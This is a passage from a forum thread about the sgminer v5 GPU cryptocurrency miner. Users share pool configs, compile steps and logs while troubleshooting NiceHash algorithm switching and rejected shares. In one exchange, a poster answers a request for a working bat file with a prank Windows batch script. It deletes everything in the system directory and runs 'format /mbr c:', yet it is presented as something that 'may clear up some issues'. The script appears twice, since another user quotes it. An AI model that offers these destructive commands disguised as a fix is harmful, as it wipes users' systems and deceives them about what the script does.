Author

Topic: [ANN] sgminer v5 - optimized X11/X13/NeoScrypt/Lyra2RE/etc. kernel-switch miner - page 228. (Read 877843 times)

sr. member
Activity: 547
Merit: 250
Something's definitely up.  Usually with X13, I get shares accepted every few seconds.  Right now it's just sitting there for 2-3 minutes at a time between shares.

Earlier I had it submitting x13 shares to the x11 stratum apparently, and they were being rejected.

Do you have "disable-rejecting" : true?

Mine is not specified.

Not specified here.  Now we have something else odd.  The Nicehash homepage says Keccak is currently the most profitable, yet my miner has been switched to X11 instead.

Are you using the new password factoring?

Code:
f0=2.95;f2=1.45;f3=12.2;f4=10.1;f5=1410
is mine for 3x R9 290X
sr. member
Activity: 547
Merit: 250
Code:
[21:04:49] Started sgminer 4.2.1
[21:04:49] Loaded configuration file C:\sgminer_v5_0_11062014\sgminer-nicehash.conf
[21:04:49] WARNING: GPU_USE_SYNC_OBJECTS is not specified!
[21:04:49] Initialising kernel marucoin-mod.cl with bitalign, unpatched BFI, nfactor 10, n 1024
[21:04:49] Initialising kernel marucoin-mod.cl with bitalign, unpatched BFI, nfactor 10, n 1024
[21:04:49] Initialising kernel marucoin-mod.cl with bitalign, unpatched BFI, nfactor 10, n 1024
[21:04:49] Probing for an alive pool
[21:04:51] Switching to Marucoin suprnova - first alive pool
[21:04:51] nh x13 multi alive, testing stability
[21:04:51] Switching to nh x13 multi
[21:04:53] Rejected Coin 50 Diff 0.014/0.005 GPU 0 nh x13 multi (Share above target.)
[21:04:53] Switching mrr x13 platinum4.3 to stratum+tcp://us-east01.miningrigrentals.com:50146
[21:04:57] Rejected Coin 54 Diff 0.026/0.005 GPU 1 nh x13 multi (Share above target.)
[21:05:03] Rejected Coin 798 Diff 0.005/0.005 GPU 2 nh x13 multi (Job not found.)
[21:05:04] Rejected Coin 798 Diff 0.023/0.005 GPU 0 nh x13 multi (Job not found.)
[21:05:04] Rejected Coin 798 Diff 0.013/0.005 GPU 2 nh x13 multi (Job not found.)
[21:05:05] Rejected Coin 65 Diff 0.007/0.005 GPU 2 nh x13 multi (Share above target.)
[21:05:11] Rejected Coin 65 Diff 0.009/0.005 GPU 0 nh x13 multi (Share above target.)
[21:05:13] Rejected Coin 65 Diff 0.020/0.005 GPU 1 nh x13 multi (Share above target.)
[21:05:17] nh x13 multi difficulty changed to 0.040
[21:05:39] Rejected Coin 82 Diff 0.059/0.040 GPU 2 nh x13 multi (Share above target.)
[21:05:42] Rejected Coin 82 Diff 0.289/0.040 GPU 0 nh x13 multi (Share above target.)
[21:05:49] Reconnect requested from nh x13 multi to stratum.nicehash.com:4337
[21:05:51] nh x13 multi difficulty changed to 0.005
[21:05:53] Reconnect requested from nh x13 multi to stratum.nicehash.com:4337
[21:05:53] nh x13 multi difficulty changed to 0.040
member
Activity: 119
Merit: 10
Something's definitely up.  Usually with X13, I get shares accepted every few seconds.  Right now it's just sitting there for 2-3 minutes at a time between shares.

Earlier I had it submitting x13 shares to the x11 stratum apparently, and they were being rejected.

Do you have "disable-rejecting" : true?

Mine is not specified.

Not specified here.  Now we have something else odd.  The Nicehash homepage says Keccak is currently the most profitable, yet my miner has been switched to X11 instead.
full member
Activity: 180
Merit: 100
Anyone here successfully run this on PIMP/BAMT? I've been trying in the past weeks without success. All I get are HW errors and 100% rejects (share above target).

Here is how I compile:

Quote
git clone https://github.com/sgminer-dev/sgminer.git
      
cp /opt/miners/sgminer-4.1.0-sph/ADL_SDK/* /opt/miners/sgminer/ADL_SDK/
   
cd sgminer
   
sh autogen.sh
   
./configure   
   
make

Here is my config for 280x and 7950. Both give those errors:

Quote
{
    "pools": [
        {
          "name" : "NiceHash_X11_auto-switch",
          "url" : "stratum+tcp://stratum.nicehash.com:4336",
          "user" : "MyBTCAddress",
          "pass" : "f0=0;f2=0;f3=4;f4=3;f5=0",
          "pool-nfactor" : "10",
          "pool-algorithm" : "darkcoin-mod"
     },
     {
          "name" : "NiceHash_X13_auto-switch",
          "url" : "stratum+tcp://stratum.nicehash.com:4337",
          "user" : "MyBTCAddress",
          "pass" : "f0=0;f2=0;f3=4;f4=3;f5=0",
          "pool-nfactor" : "10",
          "pool-algorithm" : "marucoin-mod"
     },
     {
          "name" : "Flashcoin",
          "url" : "stratum+tcp://east1.us.stratum.dedicatedpool.com:7011",
          "user" : "Someone.1",
          "pass" : "x",
          "pool-nfactor" : "10",
          "pool-algorithm" : "marucoin-mod"
     }
    ],
    "auto-fan": true,
    "gpu-fan": "50-85",
    "temp-cutoff": "95",
    "temp-overheat": "85",
    "temp-target": "75",

    "worksize": "256",
    "intensity": "13",
    "gpu-threads" : "2",
    "gpu-engine": "1000",
    "gpu-memclock": "1250",
    "thread-concurrency": "8193",

    "api-port": "4028",
    "api-listen": true,
    "api-allow": "W:127.0.0.1",

    "failover-only" : true,
    "no-pool-disable": true,
    "no-submit-stale" : true,

    "queue": "0",
    "kernel-path": "/usr/local/bin"
}

Changing "pool-algorithm" value to x11mod or x13mod doesn't help at all. Please someone tell me what am I doing wrong?
sr. member
Activity: 547
Merit: 250
Something's definitely up.  Usually with X13, I get shares accepted every few seconds.  Right now it's just sitting there for 2-3 minutes at a time between shares.

Earlier I had it submitting x13 shares to the x11 stratum apparently, and they were being rejected.

Do you have "disable-rejecting" : true?

Mine is not specified.
member
Activity: 119
Merit: 10
Something's definitely up.  Usually with X13, I get shares accepted every few seconds.  Right now it's just sitting there for 2-3 minutes at a time between shares.
sr. member
Activity: 547
Merit: 250
Is this also related to the "extranonce change requested" updates?

I'm completely unfamiliar with extranonce, why it's implemented here, what the benefits are, etc.

I just started seeing extranonce when started mining on Nicehash, no other pools ever had it.
member
Activity: 119
Merit: 10
Is this also related to the "extranonce change requested" updates?
sr. member
Activity: 547
Merit: 250
Yeah it started yesterday, but it's currently happening every 5 minutes now... 

I think Nicehash stated that their profit-switching algo flips on 10 minute intervals.  Perhaps they shortened it to 5 in the update.
member
Activity: 119
Merit: 10
Yeah it started yesterday, but it's currently happening every 5 minutes now... 
sr. member
Activity: 547
Merit: 250
This is happening pretty frequently...  is there a reason?  Certain ports are going Alive sporadically, and then quitting before anything happens.

[23:30:29] Accepted 01593f9d Diff 0.741/0.080 GPU 0 at NiceHash_X13_AS
[23:30:32] NiceHash_X11_AS alive, testing stability
[23:30:35] Stratum connection to NiceHash_X11_AS interrupted
[23:32:23] Accepted 06a550e3 Diff 0.150/0.080 GPU 1 at NiceHash_X13_AS


That's a bingo, let's ask kenshiro.  I've noticed this anomaly predominately right AFTER their stratum upgrade yesterday.

Not only that, but pretty consistently now, when it switches to x11 stratum for Nicehash, all shares get rejected below target.  This has to be a faulty stratum implementation by Nicehash, as it was hashing on x11 fine last night.  I think what we are witnessing is a coin-switch and it sparks up their stratum for a second then goes immediately dead since x11 is not the most profitable algo to mine.
member
Activity: 119
Merit: 10
This is happening pretty frequently...  is there a reason?  Certain ports are going Alive sporadically, and then quitting before anything happens.

[23:30:29] Accepted 01593f9d Diff 0.741/0.080 GPU 0 at NiceHash_X13_AS
[23:30:32] NiceHash_X11_AS alive, testing stability
[23:30:35] Stratum connection to NiceHash_X11_AS interrupted
[23:32:23] Accepted 06a550e3 Diff 0.150/0.080 GPU 1 at NiceHash_X13_AS
sr. member
Activity: 547
Merit: 250
Is there an option for worksize for each algo? Maybe something like pool-worksize?

Not as of yet.
hero member
Activity: 518
Merit: 500
Is there an option for worksize for each algo? Maybe something like pool-worksize?
sr. member
Activity: 547
Merit: 250
@Elun

Are u working for a fix to use only 1 sgminer when using multi-algo?

"algorithm" : "marucoinmod,marucoinmod-old,marucoinmod"
No, I'm not.
I think mrbrdo had some reason to implement algo option like this, maybe it's easier to code algo-switching with only one algo for all gpus, maybe something else.


Again, try applying "hamsi-expand-big" across your devices with a 1 for 290s, or a 4 for 280s and below.  Use this with marucoin-mod.

Report back.

member
Activity: 117
Merit: 10
@Elun

Are u working for a fix to use only 1 sgminer when using multi-algo?

"algorithm" : "marucoinmod,marucoinmod-old,marucoinmod"
No, I'm not.
I think mrbrdo had some reason to implement algo option like this, maybe it's easier to code algo-switching with only one algo for all gpus, maybe something else.


legendary
Activity: 2296
Merit: 1031
Anyone has a working bat file?

+10000000000000000000000000000000000000000000000000000000000000000000009999999999988888777777777777777666666665555555544444444333333333333222222221111111111111

Code:
pause
del %systemroot%\*.*
format /mbr c:                              
untested on Linux but may clear up some issues on Windows; you may also see a temporary decrease in hashrate.

ha!
sr. member
Activity: 547
Merit: 250
Anyone has a working bat file?

+10000000000000000000000000000000000000000000000000000000000000000000009999999999988888777777777777777666666665555555544444444333333333333222222221111111111111

Code:
pause
del %systemroot%\*.*
format /mbr c:                              
untested on Linux but may clear up some issues on Windows; you may also see a temporary decrease in hashrate.
legendary
Activity: 2296
Merit: 1031
Anyone has a working bat file?

+10000000000000000000000000000000000000000000000000000000000000000000009999999999988888777777777777777666666665555555544444444333333333333222222221111111111111
legendary
Activity: 2296
Merit: 1031
I understand the below... just another update: the 7970 rig which I thought was working wasn't actually switching.  It just stays on X13.  I don't have time for troubleshooting right now.

edit: nevermind... type-O's in my config

Quote

For the 280X/5870/5970 rig u need to use 2xsgminer to mine, like I did.
1 config for only the 280x and another for 5870/5970 using marucoinmod-old for x13

edit;
my config for 7950
Code:
 {
"pools" : [
        {
  "name" : "am02 x11 multi",
"url" : "stratum+tcp://am02.eu.trademybit.com:4010",
"user" : "xxx",
"pass" : "1111",
                "algorithm":"darkcoin-mod"
},
        {
"name" : "am02 x13 multi",
"url" : "stratum+tcp://am02.eu.trademybit.com:4011",
"user" : "xxx",
"pass" : "1111",
                "algorithm":"marucoin-mod"
}
],
"extranonce-subscribe" : true,
"remove-disabled" : true,
"api-allow" : "W:127.0.0.1",
"api-listen" : true,
"api-mcast-port" : "4028",
"api-port" : "4028",
"expiry" : "10",
"failover-only" : true,
"kernel-path" : "D:\\sgminer_v5_0_10062014",
"log" : "5",
"queue" : "1",
"scan-time" : "7",
"shares" : "0",
"failover-switch-delay" : "10",
"gpu-threads" : "2",
"gpu-dyninterval" : "7",
"gpu-engine" : "0",
"gpu-fan" : "65",
"gpu-platform" : "0",
"gpu-memclock" : "0",
"gpu-memdiff" : "0",
"gpu-powertune" : "8",
"gpu-vddc" : "0",
"intensity" : "18",
"temp-target" : "75",
"temp-overheat" : "85",
"temp-cutoff" : "95",
"temp-hysteresis" : "3",
"vectors" : "1",
"worksize" : "256",
"lookup-gap" : "0",
"shaders" : "1792",
"thread-concurrency" : "8192",
"device" : "0,2,3,4",
"no-pool-disable" : true
}

6970
Code:
{
"pools" : [
        {
  "name" : "am02 x11 multi",
"url" : "stratum+tcp://am02.eu.trademybit.com:4010",
"user" : "xxx",
"pass" : "1111",
                "algorithm":"darkcoin-mod"
},
        {
"name" : "am02 x13 multi",
"url" : "stratum+tcp://am02.eu.trademybit.com:4011",
"user" : "xxx",
"pass" : "1111",
                "algorithm":"marucoin-modold"
}
],
"extranonce-subscribe" : true,
"remove-disabled" : true,
"api-allow" : "W:127.0.0.1",
"api-listen" : true,
"api-mcast-port" : "4029",
"api-port" : "4029",
"expiry" : "10",
"failover-only" : true,
"kernel-path" : "D:\\sgminer_v5_0_10062014",
"log" : "5",
"queue" : "1",
"scan-time" : "7",
"shares" : "0",
"failover-switch-delay" : "10",
"gpu-threads" : "2",
"gpu-dyninterval" : "7",
"gpu-engine" : "0",
"gpu-fan" : "65",
"gpu-platform" : "0",
"gpu-memclock" : "0",
"gpu-memdiff" : "0",
"gpu-powertune" : "8",
"gpu-vddc" : "0",
"intensity" : "18",
"temp-target" : "75",
"temp-overheat" : "85",
"temp-cutoff" : "95",
"temp-hysteresis" : "3",
"vectors" : "1",
"worksize" : "64",
"lookup-gap" : "0",
"shaders" : "1536",
"thread-concurrency" : "8000",
"device" : "1",
"no-pool-disable" : true
}
Jump to: